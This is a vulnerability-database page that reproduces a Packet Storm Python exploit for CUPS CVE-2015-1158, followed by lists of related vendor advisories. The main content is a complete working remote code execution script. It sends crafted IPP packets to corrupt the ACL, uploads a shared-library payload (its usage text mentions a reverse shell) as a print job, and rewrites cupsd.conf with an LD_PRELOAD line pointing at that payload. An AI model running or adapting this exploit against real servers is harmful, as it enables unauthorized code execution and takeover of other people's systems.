Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstorm0x00stringPACKETSTORM:140920
HistoryFeb 03, 2017 - 12:00 a.m.

CUPS Remote Code Execution

2017-02-0300:00:00
0x00string
packetstormsecurity.com
2299

0.937 High

EPSS

Percentile

98.9%

JSON
`#!/usr/bin/python  
# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution  
# Google Dork: n/a  
# Date: 2/2/17  
# Exploit Author: @0x00string  
# Vendor Homepage: cups.org  
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2  
# Version: <2.0.3  
# Tested on: Ubuntu 14/15  
# CVE : CVE-2015-1158  
import os, re, socket, random, time, getopt, sys  
from socket import *  
from struct import *  
  
def banner():  
print '''  
lol ty google  
0000000000000  
0000000000000000000 00  
00000000000000000000000000000  
0000000000000000000000000000000  
000000000 0000000000  
00000000 0000000000  
0000000 000000000000  
0000000 000000000000000  
000000 000000000 000000  
0000000 000000000 000000  
000000 000000000 000000  
000000 000000000 000000  
000000 00000000 000000  
000000 000000000 000000  
0000000 000000000 0000000  
000000 000000000 000000  
0000000000000000 0000000  
0000000000000 0000000  
00000000000 00000000  
00000000000 000000000  
0000000000000000000000000000000  
00000000000000000000000000000  
000 0000000000000000000  
0000000000000  
@0x00string  
github.com/0x00string/oldays/CVE-2015-1158.py  
'''  
  
def usage ():  
print ("python script.py <args>\n"  
" -h, --help: Show this message\n"  
" -a, --rhost: Target IP address\n"  
" -b, --rport: Target IPP service port\n"  
" -c, --lib /path/to/payload.so\n"  
" -f, --stomp-only Only stomp the ACL (no postex)\n"  
"\n"  
"Examples:\n"  
"python script.py -a 10.10.10.10 -b 631 -f\n"  
"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n")  
exit()  
  
def pretty (t, m):  
if (t is "+"):  
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",  
elif (t is "-"):  
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",  
elif (t is "*"):  
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",  
elif (t is "!"):  
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",  
  
def createDump (input):  
d, b, h = '', [], []  
u = list(input)  
for e in u:  
h.append(e.encode("hex"))  
if e == '0x0':  
b.append('0')  
elif 30 > ord(e) or ord(e) > 128:  
b.append('.')  
elif 30 < ord(e) or ord(e) < 128:  
b.append(e)  
  
i = 0  
while i < len(h):  
if (len(h) - i ) >= 16:  
d += ' '.join(h[i:i+16])  
d += " "  
d += ' '.join(b[i:i+16])  
d += "\n"  
i = i + 16  
else:  
d += ' '.join(h[i:(len(h) - 0 )])  
pad = len(' '.join(h[i:(len(h) - 0 )]))  
d += ' ' * (56 - pad)  
d += ' '.join(b[i:(len(h) - 0 )])  
d += "\n"  
i = i + len(h)  
  
return d  
  
class tcpsock:  
def __init__(self, sock=None):  
if sock is None:  
self.sock = socket(  
AF_INET, SOCK_STREAM)  
self.sock.settimeout(30)  
else:  
self.sock = sock  
def connect(self, host, port):  
self.sock.connect((host, int(port)))  
def tx(self, msg):  
self.sock.send(msg)  
def rx(self):  
tmp = self.sock.recv(1024)  
msg = ""  
while tmp:  
msg += tmp  
tmp = self.sock.recv(1024)  
return msg  
  
def txrx (ip, port, proto, txpacket):  
if (proto is "tcp"):  
sock = tcpsock()  
elif (proto is "udp"):  
sock = udpsock()  
else:  
return None  
sock.connect(ip, port)  
sock.tx(txpacket)  
rxpacket = sock.rx()  
return rxpacket  
  
def locatePrinters(rhost, rport="631"):  
request = ( "GET /printers HTTP/1.1\x0d\x0a"  
"Host: " + rhost + ":" + rport + "\x0d\x0a"  
"User-Agent: CUPS/2.0.2\x0d\x0a"  
"Connection: Close\x0d\x0a"  
"\x0d\x0a")  
response = txrx(rhost, int(rport), "tcp", request)  
if response is not None:  
m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)  
if m is not None:  
printer = m.group(1)  
pretty("+","printer found: " + printer)  
else:  
pretty("-","no printers")  
exit(1)  
return printer  
  
def preparePayload(libpath):  
with open(libpath, 'rb') as f:  
payload = f.read()  
if payload is not None:  
pretty("*","Payload:\n" + createDump(payload))  
else:  
pretty("-","something went wrong")  
usage()  
return payload  
  
def seedTarget(rhost, rport, printer, payload):  
i = random.randint(1,3)  
reqid = str(pack(">i",(i+2)))  
reqid2 = str(pack(">i",(i+3)))  
printer_uri = "ipp://" + rhost + ":" + str(rport) + printer  
  
create_job_packet = ("\x02\x00"  
"\x00\x05"+  
reqid+  
"\x01"  
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"  
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"  
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +  
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"  
"\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib"  
"\x02"  
"\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01"  
"\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03"  
"\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30"  
"\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite"  
"\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32"  
"\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none"  
"\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01"  
"\x03")  
pretty("*","Sending createJob")  
  
http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"  
"Content-Type: application/ipp\x0d\x0a"  
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"  
"User-Agent: CUPS/2.0.2\x0d\x0a"  
"Connection: Close\x0d\x0a"  
"Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a"  
"\x0d\x0a")  
  
createJobRequest = http_header1 + create_job_packet  
blah = txrx(rhost,int(rport),"tcp",createJobRequest)  
if blah is not None:  
m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah)  
if m is not None:  
jobid = m.group(1)  
else:  
pretty("-","something went wrong");  
exit()  
  
pretty("*","\n" + createDump(blah) + "\n")  
pretty("*", "Sending sendJob")  
  
send_document_packet = ("\x02\x00"  
"\x00\x06"+  
reqid2+  
"\x01"  
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"  
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"  
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +  
"\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) +  
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"  
"\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib"  
"\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream"  
"\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01"  
"\x03"+  
payload)  
  
http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"  
"Content-Type: application/ipp\x0d\x0a"  
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"  
"User-Agent: CUPS/2.0.2\x0d\x0a"  
"Connection: Close\x0d\x0a"  
"Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a"  
"\x0d\x0a")  
  
sendJobRequest = http_header2 + send_document_packet  
blah2 = txrx("172.20.32.3",631,"tcp",sendJobRequest)  
pretty("*","\n" + createDump(blah) + "\n")  
pretty("*","job id: " + jobid)  
return jobid  
  
def stompACL(rhost, rport, printer):  
i = random.randint(1,1024)  
printer_url = "ipp://" + rhost + ":" + rport + printer  
  
admin_stomp = ("\x02\x00" # vers 2.0  
"\x00\x05"+ # op id: Create Job (0x0005)  
str(pack(">i",(i+1)))+  
"\x01" # op attributes marker  
"\x47" # charset  
"\x00\x12" # name len: 18  
"attributes-charset"  
"\x00\x08" # val len: 8  
"us-ascii"  
"\x48" # natural language  
"\x00\x1b" # name len: 27  
"attributes-natural-language"  
"\x00\x06" # val len: 6  
"/admin"  
"\x45" # printer-uri  
"\x00\x0b" # name len 11  
"printer-uri" +  
str(pack(">h", len(printer_url))) + printer_url +  
"\x42" # name without lang  
"\x00\x14" # name len: 20  
"requesting-user-name"  
"\x00\x06" # val len: 6  
"/admin"  
"\x02" # job attrs marker  
"\x21" # integer  
"\x00\x06" # name len: 6  
"copies"  
"\x00\x04" # val len: 4  
"\x00\x00\x00\x01" # 1  
"\x42" # name w/o lang  
"\x00\x19" # name len: 25  
"job-originating-host-name"  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x36" # nwl  
"\x00\x00" # name len: 0  
"\x00\x16" # val len: 22  
"\x00\x06" # length  
"/admin"  
"\x00\x0c"  
"BBBBBBBBBBBB"  
"\x03") # end of attributes  
  
conf_stomp = ("\x02\x00" # vers 2.0  
"\x00\x05"+ # op id: Create Job (0x0005)  
str(pack(">i",(i+2)))+  
"\x01" # op attributes marker  
"\x47" # charset  
"\x00\x12" # name len: 18  
"attributes-charset"  
"\x00\x08" # val len: 8  
"us-ascii"  
"\x48" # natural language  
"\x00\x1b" # name len: 27  
"attributes-natural-language"  
"\x00\x0b" # val len: 11  
"/admin/conf"  
"\x45" # printer-uri  
"\x00\x0b" # name len 11  
"printer-uri" +  
str(pack(">h", len(printer_url))) + printer_url +  
"\x42" # name without lang  
"\x00\x14" # name len: 20  
"requesting-user-name"  
"\x00\x0b" # val len: 11  
"/admin/conf"  
"\x02" # job attrs marker  
"\x21" # integer  
"\x00\x06" # name len: 6  
"copies"  
"\x00\x04" # val len: 4  
"\x00\x00\x00\x01" # 1  
"\x42" # name w/o lang  
"\x00\x19" # name len: 25  
"job-originating-host-name"  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x42" # nwol  
"\x00\x00" # name len: 0  
"\x00\x0c" # val len: 12  
"AAAAAAAAAAAA"  
"\x36" # nwl  
"\x00\x00" # name len: 0  
"\x00\x1b" # val len: 27  
"\x00\x0b" # length  
"/admin/conf"  
"\x00\x0c"  
"BBBBBBBBBBBB"  
"\x03") # end of attributes  
  
http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a"  
"Content-Type: application/ipp\x0d\x0a"  
"Host: " + rhost + ":" + rport + "\x0d\x0a"  
"User-Agent: CUPS/2.0.2\x0d\x0a"  
"Connection: Close\x0d\x0a"  
"Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a"  
"\x0d\x0a")  
  
http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a"  
"Content-Type: application/ipp\x0d\x0a"  
"Host: " + rhost + ":" + rport + "\x0d\x0a"  
"User-Agent: CUPS/2.0.2\x0d\x0a"  
"Connection: Close\x0d\x0a"  
"Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a"  
"\x0d\x0a")  
  
pretty("*","stomping ACL")  
pretty("*",">:\n" + createDump(http_header1 + admin_stomp))  
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp)))  
time.sleep(1)  
pretty("*",">:\n" + createDump(http_header2 + conf_stomp))  
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp)))  
  
http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"  
"Host: " + rhost + ":" + rport + "\x0d\x0a"  
"User-Agent: CUPS/2.0.2\x0d\x0a"  
"Connection: Close\x0d\x0a"  
"\x0d\x0a")  
pretty("*","checking /admin")  
pretty("*",">:\n" + createDump(http_header_check))  
res = txrx(rhost,rport,"tcp",http_header_check)  
pretty("*","<:\n" + createDump(res))  
m = re.search('200 OK', res)  
if m is not None:  
pretty("+","ACL stomp successful")  
else:  
pretty("-","exploit failed")  
exit(1)  
  
  
def getConfig(rhost, rport):  
i = random.randint(1,1024)  
original_config = ""  
http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"  
"Host: " + rhost + ":" + rport + "\x0d\x0a"  
"User-Agent: CUPS/2.0.2\x0d\x0a"  
"Connection: Close\x0d\x0a"  
"\x0d\x0a")  
  
pretty("*","grabbing configuration file....")  
res = txrx(rhost,rport,"tcp",http_request)  
res_array = res.split("\x0d\x0a\x0d\x0a")  
original_config = res_array[1]  
pretty("*","config:\n" + original_config + "\n")  
return original_config  
  
def putConfig(rhost, rport, config):  
http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"  
"Content-Type: application/ipp\x0d\x0a"  
"Host: " + rhost + ":" + rport + "\x0d\x0a"  
"User-Agent: CUPS/2.0.2\x0d\x0a"  
"Connection: Keep-Alive\x0d\x0a"  
"Content-Length: " + str(len(config)) + "\x0d\x0a"  
"\x0d\x0a")  
pretty("*","overwriting config...")  
pretty("*",">:\n" + createDump(http_request + config))  
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))  
  
def poisonConfig(config, name):  
config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d00" + name + "-001\x0a"  
return config  
  
def main():  
rhost = None;  
noshell = None;  
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])  
for opt, arg in options:  
if opt in ('-h', '--help'):  
usage()  
elif opt in ('-a','--rhost'):  
rhost = arg;  
elif opt in ('-b','--rport'):  
rport = arg;  
elif opt in ('-c','--lib'):  
libpath = arg;  
elif opt in ('-f','--stomp-only'):  
noshell = 1;  
banner()  
if rhost is None or rport is None:  
usage()  
pretty("*","locate available printer")  
printer = locatePrinters(rhost, rport)  
pretty("*","stomp ACL")  
stompACL(rhost, rport, printer)  
if (noshell is not None):  
pretty("*","fin")  
exit(0)  
pretty("*","prepare payload")  
payload = preparePayload(libpath)  
pretty("*","spray payload")  
jobid = seedTarget(rhost, rport, printer, payload)  
pretty("*","grab original config")  
OG_config = getConfig(rhost, rport)  
pretty("*","generate poison config")  
evil_config = poisonConfig(OG_config, jobid)  
pretty("*","upload poison config")  
putConfig(rhost, rport, evil_config)  
pretty("*","fin")  
exit(0);  
  
if __name__ == "__main__":  
main()  
  
`

Related

slackware 1
openvas 21
zdt 2
cvelist 1
prion 1
checkpoint_advisories 1
ubuntucve 1
debiancve 1
nessus 20
exploitpack 2
cve 1
exploitdb 2
fedora 2
debian 3
f5 2
googleprojectzero 1
ubuntu 1
packetstorm 1
osv 2
archlinux 1
cert 1
gentoo 1
mageia 1
securityvulns 2
freebsd 1
ibm 2
suse 4
oraclelinux 1
redhat 1
amazon 1
veracode 2
centos 1
slackware
slackware
[slackware-security] cups
2015-07-08 00:00:21
openvas
openvas
Slackware: Security Advisory (SSA:2015-188-01)
2022-04-21 00:00:00
Debian: Security Advisory (DLA-239-1)
2023-03-08 00:00:00
Debian Security Advisory DSA 3283-1 (cups - security update)
2015-06-09 00:00:00
zdt
zdt
CUPS 2.0.3 - Remote Command Execution Exploit
2017-02-03 00:00:00
CUPS 2.0.3 - Multiple Vulnerabilities
2015-06-23 00:00:00
cvelist
cvelist
CVE-2015-1158
2015-06-26 10:00:00
prion
prion
Design/Logic Flaw
2015-06-26 10:59:00
checkpoint_advisories
checkpoint_advisories
Apple CUPS cupsd Privilege Escalation (CVE-2015-1158)
2015-07-05 00:00:00
ubuntucve
ubuntucve
CVE-2015-1158
2015-06-09 00:00:00
debiancve
debiancve
CVE-2015-1158
2015-06-26 10:59:00
nessus
nessus
Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : cups (SSA:2015-188-01)
2015-07-08 00:00:00
Fedora 22 : cups-2.0.3-1.fc22 (2015-9726)
2015-06-22 00:00:00
GLSA-201510-07 : CUPS: Multiple vulnerabilities
2015-11-02 00:00:00
exploitpack
exploitpack
CUPS 2.0.3 - Remote Command Execution
2017-02-03 00:00:00
CUPS 2.0.3 - Multiple Vulnerabilities
2015-06-22 00:00:00
cve
cve
CVE-2015-1158
2015-06-26 10:59:00
exploitdb
exploitdb
CUPS &lt; 2.0.3 - Remote Command Execution
2017-02-03 00:00:00
CUPS &lt; 2.0.3 - Multiple Vulnerabilities
2015-06-22 00:00:00
fedora
fedora
[SECURITY] Fedora 22 Update: cups-2.0.3-1.fc22
2015-06-21 00:21:04
[SECURITY] Fedora 21 Update: cups-1.7.5-17.fc21
2015-06-21 00:36:00
debian
debian
[SECURITY] [DSA 3283-1] cups security update
2015-06-09 20:25:07
[SECURITY] [DSA 3283-1] cups security update
2015-06-09 20:24:48
[SECURITY] [DLA 239-1] cups security update
2015-06-09 10:27:37
f5
f5
SOL16794 - CUPS vulnerabilities CVE-2015-1158 / CVE-2015-1159
2015-06-23 00:00:00
K16794 : CUPS vulnerabilities CVE-2015-1158 / CVE-2015-1159
2015-06-23 00:00:00
googleprojectzero
googleprojectzero
Owning Internet Printing - A Case Study in Modern Software Exploitation
2015-06-19 00:00:00
ubuntu
ubuntu
CUPS vulnerabilities
2015-06-10 00:00:00
packetstorm
packetstorm
CUPS XSS / String Handling / Improper Teardown
2015-06-22 00:00:00
osv
osv
cups - security update
2015-06-09 00:00:00
cups - security update
2015-06-09 00:00:00
archlinux
archlinux
cups: multiple issues
2015-06-10 00:00:00
cert
cert
CUPS print service is vulnerable to privilege escalation and cross-site scripting
2015-06-09 00:00:00
gentoo
gentoo
CUPS: Multiple vulnerabilities
2015-10-31 00:00:00
mageia
mageia
Updated cups package fixes security vulnerabilities
2015-06-19 16:33:05
securityvulns
securityvulns
[USN-2629-1] CUPS vulnerabilities
2015-06-14 00:00:00
CUPS security vulnerabilities
2015-06-14 00:00:00
freebsd
freebsd
cups -- multiple vulnerabilities
2015-06-09 00:00:00
ibm
ibm
Security Bulletin: PowerKVM is affected by cups vulnerabilities (multiple CVEs)
2018-06-18 01:28:42
Security Bulletin: Multiple vulnerabilities in cups, curl, libxfont affect IBM SmartCloud Provisioning for IBM Software Virtual Appliance
2018-06-17 22:30:13
suse
suse
Security update for cups154 (critical)
2015-06-11 20:06:22
Security update for cups154 (critical)
2015-06-11 19:04:58
Security update for cups (critical)
2015-06-11 17:05:04
oraclelinux
oraclelinux
cups security update
2015-06-17 00:00:00
redhat
redhat
(RHSA-2015:1123) Important: cups security update
2015-06-17 00:00:00
amazon
amazon
Medium: cups
2015-07-07 12:34:00
veracode
veracode
Arbitrary Code Execution
2019-05-02 05:17:51
Denial Of Service (DoS)
2019-05-02 05:17:51
centos
centos
cups security update
2015-06-18 11:29:43

0.937 High

EPSS

Percentile

98.9%

JSON
Related for PACKETSTORM:140920
slackware1openvas21zdt2cvelist1prion1checkpoint_advisories1ubuntucve1debiancve1nessus20exploitpack2cve1exploitdb2fedora2debian3f52googleprojectzero1ubuntu1packetstorm1osv2archlinux1cert1gentoo1mageia1securityvulns2freebsd1ibm2suse4oraclelinux1redhat1amazon1veracode2centos1